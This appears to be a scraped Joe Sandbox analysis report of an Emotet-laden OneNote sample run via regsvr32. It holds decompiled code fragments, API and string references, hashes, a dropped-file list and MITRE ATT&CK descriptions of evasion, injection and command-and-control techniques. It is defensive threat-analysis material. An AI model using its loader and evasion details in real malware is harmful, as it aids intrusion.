				_t41 =  *__r8 & 0x0000ffff;
				if (_t41 != 0xa) goto 0x8000dce6;
				 *_t67 = 0xd;
				_t68 = _t67 + 2;
				 *_t68 = _t41;
				if ( &(_t68[0]) -  &_a1744 < 0) goto 0x8000dcc8;
				_a16 = _a16 & 0x00000000;
				_a8 = _a8 & 0x00000000;
				_v0 = 0xd55;
				_v8 =  &_a1752;
				r9d = 0;
				E0000000118000A154();
				if (0 == 0) goto 0x8000dd89;
				if (0 == 0) goto 0x8000dd79;
				_v8 = _v8 & 0x00000000;
				r8d = 0;
				r8d = r8d;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x8000dd89;
				if (0 + _a24 < 0) goto 0x8000dd46;
				 *((intOrPtr*)(__rcx + 4)) = __edi - r15d;
				goto 0x8000dcbd;
				 *((intOrPtr*)(__rcx)) = GetLastError();
				return E000000011800010B0(_t39, 0, _a5176 ^ _t91 - __rax);
			}

0x18000dc50
0x18000dc55
0x18000dc67
0x18000dc6f
0x18000dc79
0x18000dc8a
0x18000dc98
0x18000dc9c
0x18000dcb4
0x18000dcba
0x18000dcbd
0x18000dcc3
0x18000dccb
0x18000dccd
0x18000dcd8
0x18000dcdf
0x18000dce2
0x18000dce6
0x18000dcf8
0x18000dcfa
0x18000dd05
0x18000dd13
0x18000dd26
0x18000dd2b
0x18000dd35
0x18000dd3e
0x18000dd44
0x18000dd46
0x18000dd5b
0x18000dd64
0x18000dd6f
0x18000dd77
0x18000dd7e
0x18000dd84
0x18000dd8f
0x18000ddbf

APIs

WriteFile.KERNEL32 ref: 000000018000DD67
GetLastError.KERNEL32 ref: 000000018000DD89

Strings

U, xrefs: 000000018000DD13

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
Instruction ID: c34ad0e7ff2d66e96fda8e7ac49a4eca9b2c2d7f4ff30b46897494357c1f583c
Opcode Fuzzy Hash: bcf7ee1ea3ec2a9cc3b1d78a5d2c7ec9e62fd3dc134ebc80f67064554232c18b
Instruction Fuzzy Hash: E441A472614A8886EBA2CF25E4447EA7761F79C7D4F408022EE4E87758DF7CC645C750

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180004A60 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 0000000180004AA4
RaiseException.KERNEL32 ref: 0000000180004AEA

Strings

csm, xrefs: 0000000180004AD7

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
Instruction ID: 9822ff17b0ce5fbc637df8732c669b6e85e1acb8a855211156653d926a5084e0
Opcode Fuzzy Hash: 43dc2e1a8b3bf6a6ca3c7988f27fb1d1dbaf565cf4dd9104b15b21490a7c12b7
Instruction Fuzzy Hash: 8D114C72614B4482EBA28F25F440399B7A0F788BD4F188220EE8C0B769DF38CA55CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800109D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32 ref: 0000000180010A22
RegisterClassExW.USER32 ref: 0000000180010A59

Strings

P, xrefs: 00000001800109D9

Memory Dump Source

Source File: 0000000C.00000002.321165251.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 0000000C.00000002.321155111.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321197388.0000000180016000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321225112.0000000180021000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000C.00000002.321232741.0000000180023000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_180000000_regsvr32.jbxd

Similarity

API ID: ClassCursorLoadRegister
String ID: P
API String ID: 1693014935-3110715001
Opcode ID: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
Instruction ID: c953b54a92ac3cc4e92e902e3110dd604cc2aeb839ef1ea803bcd24b7a7bdda6
Opcode Fuzzy Hash: 24b0b9f3c1b09ae8b28d8b77cab2a0cc8b6b471604828e0fcca638cf8f3030e2
Instruction Fuzzy Hash: 8501B232519F8486E7A18F00F89834BB7B4F388788F604119E6CD42B68DFBDC258CB40

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: regsvr32.exePID: 1868, Parent PID: 4888COMMON

Execution Graph

Execution Coverage:	17.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	38
Total number of Limit Nodes:	4

Executed Functions

Function 00C80000 Relevance: 55.2, APIs: 5, Strings: 26, Instructions: 953
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetNativeSystemInfo.KERNELBASE ref: 00C80344
VirtualAlloc.KERNELBASE ref: 00C8038A
VirtualAlloc.KERNELBASE ref: 00C803A4
VirtualProtect.KERNELBASE ref: 00C8085C
RtlAddFunctionTable.KERNEL32 ref: 00C808E9

Strings

onTa, xrefs: 00C80148
Virt, xrefs: 00C800AD
ddFu, xrefs: 00C8013A
o, xrefs: 00C8012E
ativ, xrefs: 00C8010F
lloc, xrefs: 00C800BD
eSys, xrefs: 00C80117
ualP, xrefs: 00C800CD
RtlA, xrefs: 00C80133
Cach, xrefs: 00C80100
truc, xrefs: 00C800F2
aryA, xrefs: 00C800A5
rote, xrefs: 00C800D5
nf, xrefs: 00C80127
hIns, xrefs: 00C800EB
Flus, xrefs: 00C800E4
temI, xrefs: 00C8011F
Virt, xrefs: 00C800C5
Slee, xrefs: 00C80084
GetN, xrefs: 00C80107
ualA, xrefs: 00C800B5
Libr, xrefs: 00C8009D
ncti, xrefs: 00C80141
ct, xrefs: 00C800DD
tion, xrefs: 00C800F9
Load, xrefs: 00C80095

Memory Dump Source

Source File: 0000000D.00000002.815591209.0000000000C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_c80000_regsvr32.jbxd

Similarity

API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
String ID: Cach$Flus$GetN$Libr$Load$RtlA$Slee$Virt$Virt$aryA$ativ$ct$ddFu$eSys$hIns$lloc$ncti$nf$o$onTa$rote$temI$tion$truc$ualA$ualP
API String ID: 394283112-3605381585
Opcode ID: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction ID: f85612c87ec934a2970879abbeb498a4e55f03779724c53527be1ac5a938d1d2
Opcode Fuzzy Hash: e9a861555d927ec3db92d1fa6852e06d9629cb263f7a81f544b384a165a1d9b2
Instruction Fuzzy Hash: 00521830618B488BD759EF18D8857BAB7F0FB54308F24462DE89BC7251DB34E546CB8A

Uniqueness

Uniqueness Score: -1.00%

Function 00CC40A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVolumeInformationW.KERNELBASE ref: 00CC41EB

Strings

v[, xrefs: 00CC4152
Ql, xrefs: 00CC411D

Memory Dump Source

Source File: 0000000D.00000002.815803054.0000000000CC1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00CC1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_cc1000_regsvr32.jbxd

Yara matches

Similarity

API ID: InformationVolume
String ID: Ql$v[
API String ID: 2039140958-138011117
Opcode ID: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
Instruction ID: dcf58cf8eaaa12dfc28e78f97a8186346b959380e5369940eac63cc5df73f96f
Opcode Fuzzy Hash: 3a0f33469602c5b2414fed7c4f525ce4c0e953e4a15951e85aa6350d2a5935a1
Instruction Fuzzy Hash: D831397051CB848BD7B8DF18D48579AB7E0FB88315F60895EE88CC7295CF789888CB42

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report iMedPub_LTD_4.one

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Emotet

Yara Signatures

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Signatures

Malware Analysis System Evasion

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\825FCF33-FA95-48F7-9D0C-913B41374CD9

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\header

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000005.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000006.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000007.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000008.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000009.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000A.bin

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000000B.bin

Windows Analysis Report
iMedPub_LTD_4.one

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre